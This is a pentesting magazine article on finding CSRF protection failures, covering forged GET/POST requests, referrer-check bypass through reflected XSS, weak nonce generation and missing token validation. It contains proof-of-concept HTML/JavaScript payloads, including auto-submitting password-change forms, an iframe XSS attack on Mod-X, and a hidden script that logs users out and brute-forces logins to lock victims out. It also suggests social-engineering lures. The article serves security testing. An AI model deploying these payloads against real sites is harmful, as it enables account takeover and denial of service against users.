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Discovering Modern CSRF Patch Failures

By: Tyler Borland

Pentest Magazine

Basic Refresher
Cross-site request forgery (CSRF/XSRF) vulnerabilities allow an attacker to perform
authenticated actions without authenticating as the user. The issue revolves around general browser
architecture and its handling of the web origin policy[1]. In particular, issues stem from how it handles
same origins and authority. Some of the issues can not be fixed in browsers as the real problem is how
web applications handle actions. These vulnerabilities are easy to locate and perform attacks against
whilst allowing an attacker to completely compromise an account and/or compromise the host.
The problem is seen when the browser has stored authentication data for the
domain/origin. Data such as credential cookies, session cookies, basic/digest authorization depending
on attack vector[8], and possibly other stored authentication data the browser manages. This data is
used when another domain makes a request for external resources like images, videos, scripts, etc.
Here's how html would be used to grab an image from and load it in's
<img src= />
When the user's browser visits and sees this image tag then it will grab this
resource by making the appropriate request for the client. Assume the user is logged in with an
authenticated=yes cookie. A stripped down request for this image is:
GET /img.jpg HTTP/1.1
Cookie: authenticated=yes
The authenticated cookie for victimsite is added by the browser when making the request for This allows us to perform authenticated actions without ever having to
authenticate ourselves. Read further for theoretical and real-world exploits on how this behavior can be
abused. The focus of this article will be around the php language, but csrf issues exist throughout other
+Remote Vector
The easiest way to exploit this issue is with cross-origin communication as seen with the
previous section's and image scenario. Please re-read that section if you
do not understand how a remote vector (different origin) would work.
+Local Vector
While the name does say cross-site, the vulnerability can be exploited in the context of the same
origin and never require access to resources from another origin. This is possible by chaining other

exploits like cross-site scripting (XSS), which will be covered more later, or simply abusing any form
of valid injection points. Think about forums or blogs where you have the ability to upload avatars
from a supplied url or use bbcode (bulleting board code, a markup language for forums)[11] to display
images or movies in comments.
There is plenty of documentation explaining these fundamental concepts more in depth[10], but
the focus is on ways to exploit the issues and bypass modern protections against them. See references
in the end for further information.

The GET method in HTTP allows for many options to exploit CSRF vulnerabilities. Here's an
example form to change a user's password:
<form action=changepass.php method=GET name=changepassform>
Username: <input type=text value= name=user />
Password: <input type=password value= name=pass />
<input type=submit value=submit /></form>
If we make a request for this page attempting to login as the user admin with the password of
changeme, the request would be:
GET /changepass.php?user=admin&pass=changeme&submit=submit HTTP/1.1
Cookie: authenticated=yes
Look at how this request compares to the request for the image seen in the previous section.
What happens if html were used as such:
<img src= />
Once the victim's browser attempts to grab this resource, they will make the full request with
their authentication data, in this example the authenticated cookie. Such behavior allows an attacker to
change the victim's password with an image that will not display (unless src is dynamically switched
with a real one).
This attack vector is common in today's web applications and massive lists of unreported
vulnerabilities exist for popular content management systems. This is a perfect opportunity for the
beginning bug hunter.

When CSRF vulnerabilities gained public attention, a lot of people decided that simply
changing the form method from GET to POST would secure them against this attack. Of course this is
not true and takes little more effort to exploit CSRF via POST. So, how would an attacker go about
exploiting a form using the POST method? Let's take our example form and use the POST method:
<form action=changepass.php method=POST name=changepassform>

Username: <input type=text value= name=user />

Password: <input type=password value= name=pass />
<input type=submit value=submit /></form>
You may ask yourself how do we fill in the appropriate input values and get the user to submit
the form? Most browsers have a powerful and popular client-side language readily available to use.
That language is Javascript and it will allow us to use the DOM (Document Object Model)[9] to submit
the form and then use event handlers to do so when the page loads. Let's take a look at one line that will
allow us to automatically submit the form on page load:
<body onload='document.changepassform.submit();'>
Once the body of the page finishes loading (form is created and accessible) the onload event
triggers and submits the document's (page) form called changepassform. All we need to do is write the
values for the user input. Here is how the finished exploit would look like if we wanted to change the
password for the user, admin, to changeme.
<html><body onload='document.changepassform.submit();'>
<form action=changepass.php method=POST name=changepassform>
Username: <input type=text value=admin name=user />
Password: <input type=password value=changeme name=pass />
<input type=submit value=submit /></form></body></html>
This is usually exploited from another domain, but it is still very possible to exploit the issue
locally. A fun trick is to attempt to request the page with GET instead of POST and see if it still
executes the action. While the client-side may say POST, the server-side may not care what method is
used and let a GET method perform the action. This is caused by $_REQUEST being used and
allowing any method of user supplied data to fill the requirement. Let's take a look at a real
vulnerability I found in Kryn CMS:
Even if the application enforces POST, we can still abuse other vectors to plant the script into
the page and exploit the issue locally. Our friend here will be reflective XSS, but any kind of script
injection vulnerability will work.

Security Attempts
There exist a lot of different patch attempts to secure against CSRF vulnerabilities. I personally
have seen quiet a few strange patch attempts because the developers did not understand the full depth
of attack vectors, such as changing the form method from GET to POST. I've seen developers think the
only exploitation vector was locally with an image and they would be secure by enforcing extension
checking and character restrictions on forum bbcode that allowed the display of images. Even locally
the issue still existed and could be exploited as other tags referenced external resources, such as
[video]. The remote attack vector also remained completely untouched.
Next, some of the most common protections you will see implemented today will be discussed.
These protections are referrer/location checking, captchas (out of the scope of this document), and

nonce tokens. We will start with the defense that's the most straightforward to bypass, referrer
+ Referrer Checking
The referrer checking security mechanism is for protection from remote attack vectors. The idea
is that the request has to come from the same domain that they are attempting the actions on. If it does
not, the referrer check will fail and alert the application the request came from outside of a valid
domain. To show you a real-world example, let's take a look at some vulnerabilities I found in Mod-X
The referrer protection check seen in Mod-X was:
if (!empty($referer)) { if (!
preg_match('/^'.preg_quote(MODX_SITE_URL, '/').'/i', $referer)) {
MODX_SITE_URL is globally defined and you can think of it as the domain that Mod-X is
running on. The regex is saying it must start with the defined domain name ( and end
in /. This start and end value checks prevent someone from creating to
bypass the check. $referer is a variable holding the global php variable
$_SERVER['HTTP_REFERER'];. Now, if the referrer is not empty and contains the domain name,
then the referrer is validated.
This protection can be effective, but definitely not a panacea. Old bugs in places like
xmlhttprequest and flash/java allowed you to set the referrer header across origins for the request on
behalf of the user[6]. However, these have been taken care of long ago so we will need a more globally
acceptable and modern solution. We come back to our old friend XSS.
Through reflective XSS, we have the ability to inject our script into the page. We can use an
iframe pointing to XSS that submits the vulnerable form. This type of attack chain can be used to
bypass nonce tokens and practically any other form of security surrounding it. Here's the proof of
concept exploit abusing the Mod-X vulnerabilities:
<iframe src="</title></head><body
onload='document.formcool.submit();'><form name='formcool' method='POST'
action=''><input type='hidden' name='id' value=''><input
type='hidden' name='pass1' value='admin2' /><input type='hidden' name='pass2' value='admin2'
/><input type='submit' name='save' value='Submit+Query' /></form>" />
The iframe points to an XSS injection found in the img variable of editor.php. It then injects the
vulnerable form (password change) and the form submitting javascript into the page. Once the iframe
loads, the injection will submit inside of's origin on behalf of the victim visiting Because the javascript is submitting from the domain, the referrer
checking is bypassed. In this proof of concept, the iframe is not stealthy at all and you would find this
hidden if not removed dynamically after success.

+Improper Nonce Entropy

Now let's discuss the most common and known form of defense for CSRF vulnerabilities, nonce
tokens. The idea is to use a pseudo-random number used only once, or what's commonly known as
nonce, as a hidden field for the form submission. Some security stipulations are that it's generated with
a secure form of entropy, implemented appropriately, and also validated by the server.
A nonce is a number that is only generated once and acts as a unique token for the user action.
The nonce is then added to a hidden input field for each form that should require a point of validation
before action. Once the form is submitted, the server-side language needs to check if the token is
correct. If the token is not valid, the request is not processed. Taking our example password change
form, let's add the hidden nonce check:
<form action=changepass.php method=POST name=changepassform>
Username: <input type=text value= name=user />
Password: <input type=password value= name=pass />
<input type=hidden value=3c8376f8198cd374 name=token />
<input type=submit value=submit /></form>
The value for the hidden token field (3c8376f8198cd374) is where the randomly generated
nonce will be placed for each user action. However, there isn't a simple function like token() to
generate secure entropy for the nonce. Because there is no standard function to generate this token,
there ends up being several different homegrown solutions for creating and managing the tokens.
The starting tactic I use when checking for weak entropy is to generate a massive amount of the
tokens quickly and see how random it really is across the large data set. When performing these
requests, be careful because you may DoS the server. Additionally, alarms may be triggered that gets
your ip blocked. This test is a tradeoff with the time you have and how thorough you want to check this
vector. You may want to do quick bursts to different pages with available tokens on a random time
limit between minimum and maximum (5-30 seconds). The speed is important to check for weak timebased entropy or possible entropy source saturation issues.
If you notice the randomization starts off great, then gets weaker later on, you may be saturating
or have saturated the entropy source. From here you can abuse the entropy source before you attempt to
narrow down the victim's nonce. However, it's rare to see such a poor implementation or entropy
reduction attack. Instead, let's talk about patterns for weak algorithms.
Check and see if the nonce value is randomized all the time, random for one action, or random
per session. I've seen implementations where the nonce is generated until used or a hashed session id is
used until a new one is generated on next login or timeout period. Then see what the length is and the
character set being used. Is it 4 characters long and only using 0-9 for a character set? Are there static
characters being used? Maybe only the least or most significant 4 characters of 16 are actually
randomized and the rest is based on a unique value, but not by user, where you can request your own
token and then bruteforce the 4 missing characters. You may find such algorithms where a token uses
date(), hour/minute on time(), and other known and slower changing values. These types of algorithms
will allow for a more reliable bruteforce attack against them.
Conducting bruteforce attacks may end up being a bit complicated and/or not very reliable.
Your goal is to get the victim to stay on your site for long enough to generate a valid token for the

victim. Techniques for keeping the victim on the attacker's site mostly involve either direct or generic
social engineering. Proof of concepts usually involve game sites (page change in the site should not
stop the attack) where the victim can play games while being exploited. Porn websites are a common
distribution point used often in real-world exploitation. The most effective will be a targeted and
specially crafted page after researching wanted victim's interests (spear phishing).
For interesting techniques you will want to look into malware distribution groups and data.
Drive-by malware need to have exploit packs finish which may require attacks that take a while to
work like large heap sprays. They like using movie/music streaming to keep them on the page while the
work gets done in the background.
For use until action or per session tokens, you can attempt to bruteforce a token with the given
character set. However, there's a more elegant solution to this and will bypass server-side token attempt
limits. The technique involves the token being used with GET so it is passed via url. We can use
browser history tricks like the old CSS history hack[3] which only validates client-side and never needs
to touch While these techniques are out of the scope for this document, I have provided
a link to a proof of concept of this technique[4]. The more validation turns to accessible client-side
storage, like local storage, local sql databases, and etc., the more may be possible without ever having
to generate requests to external origin's. Thanks to HTML5, this is the way the web is moving to
offload from remote servers.
With always random, but weak size and character set, your goal is to generate one good token
and constantly hit the form with your generated token until successful. The next question becomes how
to tell if the attack was successful or not? If we are talking about a simple password change form
exploit from a remote php web server, you can use cURL to attempt to login to the account with your
defined values. If successful, stop, if not then continue looping around your chunk of script/code. It is
suggested to try a large set of bruteforce attempts before checking if login is successful as to lower
lockouts, bruteforce alerts, and large amounts of traffic to
Bruteforcing isn't the most elegant solution and there's lots of ways to deny such simple attacks
by invalidating the user/session/ip after many failed token validations attempts.
Next, it's important to discuss weaknesses in the algorithm itself. The code that floats around
most sites for secure generation involve base64 encoding an algorithm that uses time() and another
value. However, time() in PHP is based on epoch, which is a known value:
Returns the current time measured in the number of seconds since the Unix Epoch (January 1 1970
00:00:00 GMT). [2]
This means we can generate our own time() locally and not worry about this piece of entropy.
The next step is to take a look at other sources of entropy that may be used in the algorithm. Typically
this involves something from the user so the token generated from one user is not the same as another
user. Because of this there ends up being lots of room for basic mistakes such as using a statically
known value like the username. Perhaps such an algorithm:
$token = base64_encode(time() + $username);
The username is used to exploit the password change example, so this value is also known to us.
As we can generate the same time() that the remote server would, we now have both pieces of entropy

to generate a valid token for the victim's action. Attacking over the internet will involve some lag time
from the local time() generation than the server's time(), so a little math, response timestamps, and any
further validation may be needed. This could end up taking a few attempts during the victim's visit.
Even with these minor issues it is a much more reliable exploit.
Finally, there may also be issues with the language's use of certain functions. Some function
that may have been a secure form of entropy may no longer be secure. Samy Kamkar discovered this
and used the discovery to know supposedly random session values to attack Facebook. He then
proceeded to make a humerous blackhat presentation (video and/or presentation) out of it that I highly
suggest if you are looking for cryptographic weaknesses[7]. These types of issues exist and are
generally very dangerous when discovered, so the issues are reported quiet often. It is best to
check/follow the language's bug tracker to find more relevant cryptographic weaknesses.
+Improper Nonce Validation
With the harder way to defeat nonce checking is out of the way, let's talk about improper
validation. This vulnerability exists in a lot of web sites including popular sites. What happens is a
secure token will be generated and a good implementation used, but the code never validates the token
when the actions are attempted. For the example password change form, let's change nothing about it
and keep the hidden nonce token field. Let's assume that it uses appropriate entropy and a limit on
token failures per session. What happens if we were to submit that form without even including the
token value or the entire field? If the password still changes it means that they generate a valid nonce,
but they never validate against it for the action.
It seems almost unbelievable this would happen in popular/production sites, but I would like to
show an example that my friend M.J. Keith found in Facebook's implementation[5]. Facebook created
their token with the name of post_form_id that allowed different user actions. When this field was
simply removed from the request, the action was still performed. This makes all the nonce security
+Script Injection Invalidates Most Security
The final form of attack to discuss is chaining vulnerabilities. You can have the best security
against CSRF exploits, but if a script injection vulnerability exists in the same origin it invalidates any
security. The reason is Javascript has access to all html objects and attributes on the page via the DOM.
Let's take our hidden field nonce token:
<input type=hidden value=3c8376f8198cd374 name=token />
Let's also take a look at our simple javascript form submission line:
<body onload='document.changepassform.submit();'>
By object names you can select the contents of the nonce token and plant it into the appropriate
value for your form. The document.changepassform.token.value element should give you access to this
data. If the form name is dynamic or just doesn't have a name, you can also access the forms by using
forms[#] and elements by forms[#].elements[#]. These values start at 0 and will increase for each form
seen in the document (page). For example, let's say our changepassform was the first form on the page.
We could create our own form and fill in the token with a token from another form or we can submit a

form already on the page by filling in everything other than the token and submitting it. Let's say an
injection was found that allows script insertion after the form. Also, let's say the target form is the first
in the document. If the form is:
<form action="changepass.php" method="POST" name="myform">
Username: <input type="text" value="" name="user" />
Password: <input type="password" value="" name="pass" />
<input type=hidden value=3c8376f8198cd374 name=token />
<input type="submit" value="submit" /> </form>
Our injection would then be:
This allows us to completely bypass any nonce token checking with a reflective script injection.

Detecting Vulnerabilities
There are several ways to detect this type of vulnerability when looking at a web application.
Some people do it by inspecting each form with firebug, but I find it easier to look at the requests
coming across to see any exploitable background activity. Seeing as I use Firefox I'll be using the Live
HTTP Headers (LHH from now on) and Web Developer's Toolbar plugins. We will be using a place
called to play on. The reason I chose this website is I want to show you how to
filter out junk traffic to get what you want. It also runs a popular CMS called php-fusion, thus showing
you how widespread these issues are.
Let's begin by starting up LHH and attempting to login. You should notice a lot of background
noise. The reason is the site uses ajax chatboxes for the users and it updates frequently. To filter out the
noise, the tool can be given a regex expression for blacklists. In the LHH window/tab, navigate over to
the Config section and check Exclude URLs with regexp. If you see something you want to filter
then append it to the current exclusions with |texttoexclude. Here is my exclude list for
securityoverride, .gif$|.jpg$|.ico$|.css$|.js$|.png$|chat|check|shoutbox .
With LHH capturing, submit the form and take a look at the parameters being passed. When
submitting user as admin and password as blah, this is what I see:

There are three parameters being passed for the login. The parameters are user_name,
user_pass, and login via POST. None of these values are random. Two parameters we may or may not
know depending on the attack and one static value we don't have to worry about (login=Login). Now,
you can create an account and keep clicking on the different forms and seeing the background activity
to look for attack vectors. Given article size, I will show you one avenue to get started, the logout link.
The logout feature uses a basic GET query to log the user out.

Just make a request for /setuser.php?logout=yes to log the current user out. From here, you can
check for local attack vectors. We have url given avatars, forum images, signature images, etc. Lots of
things that allow for local vectors to log a user out, but some restriction bypassing may be required.
The goal of a lone logout csrf is to make the injection reach the front page (shoutboxes are awesome
for this) and log everyone out as soon as they log in.
To move things along, I want to instead look at a remote attack vector. We can log a person out
and perform login attempts as the victim. These kinds of actions are not usually given a random nonce
because it doesn't directly effect the user. However, let's think like a malicious attacker and see what is
possible with these two actions? Think about business logic flaws. In this case, too much security
causing the issue of denying service.

Have you been to a site that employs account lockouts, ip lockouts, session destruction, and etc.
after a certain amount of failed login attempts? How about after failed token guess attempts? Exploit
attempts? Well, why don't we attempt to log the user out and bruteforce an account in hopes to lock
their own account or ip. Let's take a look at a script I wrote to do just that:
<iframe src="" name="brute"
<form target="brute" action="" method="POST"
<input style="display:none;" type="text" value="" name="user_name" />
<input style="display:none;" type="password" value="" name="user_pass" />
<input style="display:none;" type="submit" name="login" value="Login" onClick="submitit()" />
<textarea name="puthere" rows="30" cols="40" id="puthere">Signed user out of account...</textarea>
var i = 5; // set amount to bruteforce before lockout
var z = 0; // how many hits
hit = setInterval('document.forms[0]',5000); // click() instead of submit() to pass submit
function submitit() {
key = Math.random(); // random pass for PoC
document.getElementById("puthere").innerHTML =
document.getElementById("puthere").innerHTML + "\nAttacking admin with "+key;
document.forms[0].user_name.value="admin"; // static for one user attack (login limits)
document.forms[0].user_pass.value=key; // randomly generated pass
z = z+1;
if (z == i) {
window.clearInterval(hit); // Once lockout is hit, stop attack
The textarea will be dynamically updated with actions of the script and everything else is
hidden with style=display:none. We are attempting to log the user out and guess passwords for the
account admin every 5 seconds. You would want to view the iframe to validate the remote vector
doesn't have extra security like referrer checking. Make sure the iframe gives you the appropriate error
or you see the appropriate responses in LHH. Running the above script on a remote server shows:

This screenshot validates that the attack works. All wanted parameters are sent via POST and
the appropriate response from the victim server is seen (error=3 means login failed). does not employ login attempt lockouts and a live sample for this magazine may
cause issues. I included this to show you how to think about such indirect attacks when looking at the
actions available to you. Logins and the like are generally ignored because they can't be directly used to
compromise accounts, but many possibilities exist beyond compromise. My favorite is abusing IPS
systems on and sending attack traffic from a victim to get their ip blocked (remove 5
second timer and have fun with fail2ban). What effect could a spear phishing campaign to block people
out of a competitor's product have?

Cross-site request forgery is a very simple attack to perform and can cause devastating effects.
These issues exist all over as they are easy to forget or not see value in immediately. I hope I gave you
enough information and ammo to test and prove such attack vectors. Please check my bio and send me
an email if you have any further questions.

Black Box Vulnerability Detection List

Check all user actions for nonce tokens
If no nonce token check then look at the http method
If GET used then validate action was performed
If action performed then validate from another account (unique parameters)
If validated then check for local attack vectors through valid injections
(signatures, avatars, banners, embedded videos, etc.) or script injection attacks
(xss, sql insert, etc.)
If no local vectors or local is not needed then validate from remote vector
If remote vector does not work, perhaps referrer checking is used

If validation fails then check variables and see if user data or any unique data is
present in the request
If user data, check if you can retrieve that data with client-side attacks like
history finding
If user data, check if you can retrieve that data with image validation with
onerror or relevant event handlers (ex: user data in directory path of private
If POST used then check if action can be performed with GET ($_REQUEST used)
Repeat steps for GET validation with exclusion of valid injections
If nonce tokens then check for improper implementation, entropy, and/or validation
Generate lots of tokens quickly
Be wary of accidentally causing a DoS or getting ip blocked automatically or
If wary then make slow or chunked requests to random pages with available
nonces on randomized timer within minimum and maximum limit (ex: 5-30
Are the tokens random always, per action, or per session
Are the tokens created using remotely accessible content loaded by the user like ajax
(<script src=>)
Check if PRNG is based off data we know like time() and/or factual user data (like
Decode any encoding like base64 if applicable before looking
Are the tokens properly validated
Perform action without nonce token value
Perform action without nonce token field
Are the tokens bruteforceable
Check for small token size and/or weak character sets (ex: 0-9)
Look for patterns in generation (ex: statically placed characters in multiple or all
If it starts off good and gets weaker later on, perhaps entropy exhaustion
Fail lots of token checks to find any token guess limits
If token guess limits set then see if action uses GET and per action/per session
implementation used
If requirements met then attempt a client-side attack like css history check to
bypass server-side limits
If no weaknesses in nonce generation, implementation, or validation then attempt to find
script insertion vulnerabilities (xss,sql insert,etc.) to fill value(s) in form dynamically or
possibly create own with nonce from other form.

[1] Web Origin Policy RFC
[2] PHP time()
[3] CSS Browser
History Check
[4] - CSRF token

bruteforce with CSS history check

[5] - Facebook CSRF Invalid Token Validation Attack
[6] - Same Origin Bypasses in
Current Browsers
[7] Weak Cryptographic Generation of Session ID's
[8] HTTP Auth Attack
[9] DOM
[10] In-Depth Basics of CSRF/XSRF
[11] - BBCode

Tyler Borland has created a covert channel over tcp/udp traffic that is not known to modern
network active warden systems, found a new way for phishers to phish credentials on any site
that allows remote content to be loaded (images), has a few published exploits and papers,
and is currently working on his exploit mutation engine for bypassing ids/ips signatures.
He is always learning and testing new techniques to keep on the cutting edge of memory
corruption, web exploitation, and exploit development.

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